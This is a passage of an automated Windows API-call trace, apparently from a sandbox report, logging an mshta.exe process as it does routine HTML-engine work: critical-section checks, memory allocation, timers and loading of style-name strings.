RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.405] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.405] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.405] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.405] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.405] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.405] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.405] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.405] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.406] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.406] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.406] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.406] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.406] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.407] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.407] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.407] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.407] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.407] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.407] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.407] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.408] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.412] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.412] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.412] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.412] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.412] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.413] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.413] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.413] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.413] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.413] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.413] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.413] malloc (_Size=0x194) returned 0xc5d598 [0161.414] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.414] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.414] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.414] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.414] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.414] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.414] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.414] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.414] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.414] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.414] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.415] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.415] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.415] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.415] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.415] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.415] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.415] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.415] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.415] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.415] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.415] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.415] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.415] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.416] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.416] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.416] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.416] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.416] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.416] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.416] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.416] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.416] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.416] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.416] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.417] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.417] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.417] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.417] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.417] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.417] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.417] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.417] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.417] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.417] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.418] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.418] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.418] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.418] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.418] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.418] malloc (_Size=0xfc) returned 0xc5d738 [0161.418] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.419] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.419] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.419] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.419] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.419] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.419] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.419] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.420] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.420] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.420] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.420] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.420] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.421] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.421] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.421] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.421] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.421] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.421] QueryPerformanceCounter (in: lpPerformanceCount=0xd11de0 | out: lpPerformanceCount=0xd11de0*=3098024047311) returned 1 [0161.422] GetCurrentThreadId () returned 0xb48 [0161.422] GetCurrentThreadId () returned 0xb48 [0161.422] GetCurrentThreadId () returned 0xb48 [0161.422] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.422] InitOnceExecuteOnce (in: InitOnce=0x6e89927c, InitFn=0x6dd8e660, Parameter=0x0, Context=0x0 | out: InitOnce=0x6e89927c, Parameter=0x0, Context=0x0) returned 1 [0161.422] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.422] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.422] InitOnceExecuteOnce (in: InitOnce=0x6e89927c, InitFn=0x6dd8e660, Parameter=0x0, Context=0x0 | out: InitOnce=0x6e89927c, Parameter=0x0, Context=0x0) returned 1 [0161.422] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.422] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.423] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.423] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.423] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.423] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.423] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.423] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.423] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.423] InitOnceExecuteOnce (in: InitOnce=0x6e89927c, InitFn=0x6dd8e660, Parameter=0x0, Context=0x0 | out: InitOnce=0x6e89927c, Parameter=0x0, Context=0x0) returned 1 [0161.423] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.424] LsSetDoc () returned 0x0 [0161.424] LsCreateLine () returned 0x0 [0161.424] LsDestroyLine () returned 0x0 [0161.425] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.425] QueryPerformanceCounter (in: lpPerformanceCount=0xd11de0 | out: lpPerformanceCount=0xd11de0*=3098024385496) returned 1 [0161.425] GetCurrentThreadId () returned 0xb48 [0161.425] GetCurrentThreadId () returned 0xb48 [0161.425] GetCurrentThreadId () returned 0xb48 [0161.425] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.425] LsSetDoc () returned 0x0 [0161.425] LsCreateLine () returned 0x0 [0161.426] LsDestroyLine () returned 0x0 [0161.427] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.427] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.427] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.427] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.427] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.427] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.427] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.428] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.428] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.428] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.429] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.429] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.429] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.429] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.430] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.430] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.430] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.430] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.431] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.431] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.431] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.431] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.431] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.432] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.432] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.432] malloc (_Size=0x140) returned 0xc5d840 [0161.432] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.433] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.433] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.433] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.433] QueryPerformanceCounter (in: lpPerformanceCount=0xd11de0 | out: lpPerformanceCount=0xd11de0*=3098025243331) returned 1 [0161.433] GetCurrentThreadId () returned 0xb48 [0161.433] GetCurrentThreadId () returned 0xb48 [0161.434] GetCurrentThreadId () returned 0xb48 [0161.434] InitOnceExecuteOnce (in: InitOnce=0x6e89927c, InitFn=0x6dd8e660, Parameter=0x0, Context=0x0 | out: InitOnce=0x6e89927c, Parameter=0x0, Context=0x0) returned 1 [0161.434] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.434] LsSetDoc () returned 0x0 [0161.434] LsCreateLine () returned 0x0 [0161.435] LsDestroyLine () returned 0x0 [0161.435] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.435] QueryPerformanceCounter (in: lpPerformanceCount=0xd11de0 | out: lpPerformanceCount=0xd11de0*=3098025401836) returned 1 [0161.435] GetCurrentThreadId () returned 0xb48 [0161.435] GetCurrentThreadId () returned 0xb48 [0161.435] GetCurrentThreadId () returned 0xb48 [0161.435] InitOnceExecuteOnce (in: InitOnce=0x6e89927c, InitFn=0x6dd8e660, Parameter=0x0, Context=0x0 | out: InitOnce=0x6e89927c, Parameter=0x0, Context=0x0) returned 1 [0161.435] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.436] LsSetDoc () returned 0x0 [0161.436] LsCreateLine () returned 0x0 [0161.436] LsDestroyLine () returned 0x0 [0161.436] QueryPerformanceCounter (in: lpPerformanceCount=0xd11de0 | out: lpPerformanceCount=0xd11de0*=3098025553687) returned 1 [0161.437] GetCurrentThreadId () returned 0xb48 [0161.437] GetCurrentThreadId () returned 0xb48 [0161.437] GetCurrentThreadId () returned 0xb48 [0161.437] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.437] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.437] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.438] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.438] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.438] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.439] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.439] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.439] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.439] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.439] InitOnceExecuteOnce (in: InitOnce=0x6e89927c, InitFn=0x6dd8e660, Parameter=0x0, Context=0x0 | out: InitOnce=0x6e89927c, Parameter=0x0, Context=0x0) returned 1 [0161.440] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.440] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.441] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.441] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.441] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.442] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.442] LoadStringW (in: hInstance=0x6d6d0000, uID=0x3e8, lpBuffer=0x198964, cchBufferMax=256 | out: lpBuffer="Normal") returned 0x6 [0161.442] LoadStringW (in: hInstance=0x6d6d0000, uID=0x3e9, lpBuffer=0x198964, cchBufferMax=256 | out: lpBuffer="Formatted") returned 0x9 [0161.442] LoadStringW (in: hInstance=0x6d6d0000, uID=0x3ea, lpBuffer=0x198964, cchBufferMax=256 | out: lpBuffer="Address") returned 0x7 [0161.442] LoadStringW (in: hInstance=0x6d6d0000, uID=0x3eb, lpBuffer=0x198964, cchBufferMax=256 | out: lpBuffer="Heading 1") returned 0x9 [0161.442] LoadStringW (in: hInstance=0x6d6d0000, uID=0x3ec, lpBuffer=0x198964, cchBufferMax=256 | out: lpBuffer="Heading 2") returned 0x9 [0161.442] LoadStringW (in: hInstance=0x6d6d0000, uID=0x3ed, lpBuffer=0x198964, cchBufferMax=256 | out: lpBuffer="Heading 3") returned 0x9 [0161.442] LoadStringW (in: hInstance=0x6d6d0000, uID=0x3ee, lpBuffer=0x198964, cchBufferMax=256 | out: lpBuffer="Heading 4") returned 0x9 [0161.442] LoadStringW (in: hInstance=0x6d6d0000, uID=0x3ef, lpBuffer=0x198964, cchBufferMax=256 | out: lpBuffer="Heading 5") returned 0x9 [0161.442] LoadStringW (in: hInstance=0x6d6d0000, uID=0x3f0, lpBuffer=0x198964, cchBufferMax=256 | out: lpBuffer="Heading 6") returned 0x9 [0161.442] LoadStringW (in: hInstance=0x6d6d0000, uID=0x3f1, lpBuffer=0x198964, cchBufferMax=256 | out: lpBuffer="Numbered List") returned 0xd [0161.442] LoadStringW (in: hInstance=0x6d6d0000, uID=0x3f2, lpBuffer=0x198964, cchBufferMax=256 | out: lpBuffer="Bulleted List") returned 0xd [0161.443] LoadStringW (in: hInstance=0x6d6d0000, uID=0x3f3, lpBuffer=0x198964, cchBufferMax=256 | out: lpBuffer="Directory List") returned 0xe [0161.443] LoadStringW (in: hInstance=0x6d6d0000, uID=0x3f4, lpBuffer=0x198964, cchBufferMax=256 | out: lpBuffer="Menu List") returned 0x9 [0161.443] LoadStringW (in: hInstance=0x6d6d0000, uID=0x3f5, lpBuffer=0x198964, cchBufferMax=256 | out: lpBuffer="Definition Term") returned 0xf [0161.443] LoadStringW (in: hInstance=0x6d6d0000, uID=0x3f6, lpBuffer=0x198964, cchBufferMax=256 | out: lpBuffer="Definition") returned 0xa [0161.443] LoadStringW (in: hInstance=0x6d6d0000, uID=0x3f8, lpBuffer=0x198964, cchBufferMax=256 | out: lpBuffer="Paragraph") returned 0x9 [0161.443] LoadStringW (in: hInstance=0x6d6d0000, uID=0x3f9, lpBuffer=0x198b7c, cchBufferMax=256 | out: lpBuffer="
") returned 0x5
	[0161.443] LoadStringW (in: hInstance=0x6d6d0000, uID=0x3fa, lpBuffer=0x198b7c, cchBufferMax=256 | out: lpBuffer="
") returned 0x9 [0161.443] LoadStringW (in: hInstance=0x6d6d0000, uID=0x3fb, lpBuffer=0x198b7c, cchBufferMax=256 | out: lpBuffer="

") returned 0x4 [0161.443] LoadStringW (in: hInstance=0x6d6d0000, uID=0x3fc, lpBuffer=0x198b7c, cchBufferMax=256 | out: lpBuffer="

") returned 0x4 [0161.443] LoadStringW (in: hInstance=0x6d6d0000, uID=0x3fd, lpBuffer=0x198b7c, cchBufferMax=256 | out: lpBuffer="

") returned 0x4 [0161.443] LoadStringW (in: hInstance=0x6d6d0000, uID=0x3fe, lpBuffer=0x198b7c, cchBufferMax=256 | out: lpBuffer="

") returned 0x4 [0161.443] LoadStringW (in: hInstance=0x6d6d0000, uID=0x3ff, lpBuffer=0x198b7c, cchBufferMax=256 | out: lpBuffer="

") returned 0x4 [0161.443] LoadStringW (in: hInstance=0x6d6d0000, uID=0x400, lpBuffer=0x198b7c, cchBufferMax=256 | out: lpBuffer="
") returned 0x4 [0161.444] LoadStringW (in: hInstance=0x6d6d0000, uID=0x401, lpBuffer=0x198b7c, cchBufferMax=256 | out: lpBuffer="
    ") returned 0x4 [0161.444] LoadStringW (in: hInstance=0x6d6d0000, uID=0x402, lpBuffer=0x198b7c, cchBufferMax=256 | out: lpBuffer="
      ") returned 0x4 [0161.444] LoadStringW (in: hInstance=0x6d6d0000, uID=0x403, lpBuffer=0x198b7c, cchBufferMax=256 | out: lpBuffer="") returned 0x5 [0161.444] LoadStringW (in: hInstance=0x6d6d0000, uID=0x404, lpBuffer=0x198b7c, cchBufferMax=256 | out: lpBuffer="") returned 0x6 [0161.444] LoadStringW (in: hInstance=0x6d6d0000, uID=0x405, lpBuffer=0x198b7c, cchBufferMax=256 | out: lpBuffer="
      ") returned 0x4 [0161.444] LoadStringW (in: hInstance=0x6d6d0000, uID=0x406, lpBuffer=0x198b7c, cchBufferMax=256 | out: lpBuffer="
      ") returned 0x4 [0161.444] LoadStringW (in: hInstance=0x6d6d0000, uID=0x407, lpBuffer=0x198b7c, cchBufferMax=256 | out: lpBuffer="

      ") returned 0x3 [0161.444] LoadStringW (in: hInstance=0x6d6d0000, uID=0x408, lpBuffer=0x198b7c, cchBufferMax=256 | out: lpBuffer="

      ") returned 0x5 [0161.445] CActiveIMMAppEx_Trident:IUnknown:AddRef (This=0x610430) returned 0x2 [0161.445] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.445] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.445] CoTaskMemFree (pv=0x0) [0161.445] CoTaskMemFree (pv=0x0) [0161.445] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.445] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.446] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x198c74, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\mshta.exe" (normalized: "c:\\windows\\syswow64\\mshta.exe")) returned 0x1d [0161.446] StrStrIA (lpFirst="C:\\Windows\\SysWOW64\\mshta.exe", lpSrch="msaccess.exe") returned 0x0 [0161.446] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.446] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.447] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.447] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.447] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.447] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.447] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.447] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.447] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x6c5c60, Size=0x2fe) returned 0x6c5c60 [0161.448] memcpy_s (in: _Destination=0x6c5d24, _DestinationSize=0x23a, _Source=0x197d88, _SourceSize=0x2 | out: _Destination=0x6c5d24) returned 0x0 [0161.448] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.449] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.449] IsWinEventHookInstalled (event=0x800e) returned 0 [0161.449] IsWinEventHookInstalled (event=0x8019) returned 1 [0161.452] GetCurrentThreadId () returned 0xb48 [0161.452] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.452] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.453] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.453] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.453] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.453] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.453] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.453] IsCharSpaceW (wch=0x73) returned 0 [0161.453] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.453] IsCharSpaceW (wch=0x73) returned 0 [0161.453] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.453] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.453] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.453] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.454] GetCurrentThreadId () returned 0xb48 [0161.454] IUnknown:AddRef (This=0xd1bfc0) returned 0x0 [0161.454] IUnknown:Release (This=0xd1bfc0) returned 0x2 [0161.454] IUnknown:Release (This=0xd1bfc0) returned 0x2 [0161.454] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.454] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.454] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.455] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.455] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.455] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.455] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.455] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.455] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.456] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.456] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.456] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.456] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.456] memcpy_s (in: _Destination=0x6c5d4a, _DestinationSize=0x214, _Source=0x197d88, _SourceSize=0x6 | out: _Destination=0x6c5d4a) returned 0x0 [0161.456] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.456] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.457] IsWinEventHookInstalled (event=0x800e) returned 0 [0161.457] IsWinEventHookInstalled (event=0x8019) returned 1 [0161.458] GetCurrentThreadId () returned 0xb48 [0161.458] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.458] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.458] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.458] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.458] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.458] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.458] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.458] IsCharSpaceW (wch=0x73) returned 0 [0161.458] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.458] IsCharSpaceW (wch=0x73) returned 0 [0161.459] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.459] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.459] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.459] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.459] GetCurrentThreadId () returned 0xb48 [0161.459] IUnknown:AddRef (This=0xd6c100) returned 0x0 [0161.459] IUnknown:Release (This=0xd6c100) returned 0x2 [0161.459] IUnknown:Release (This=0xd6c100) returned 0x2 [0161.459] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.459] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.460] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.460] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.460] SysStringLen (param_1="The system cannot locate the resource specified.\r\n") returned 0x32 [0161.460] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.460] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.460] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.461] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.500] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.501] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.501] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.501] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.502] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.502] memcpy_s (in: 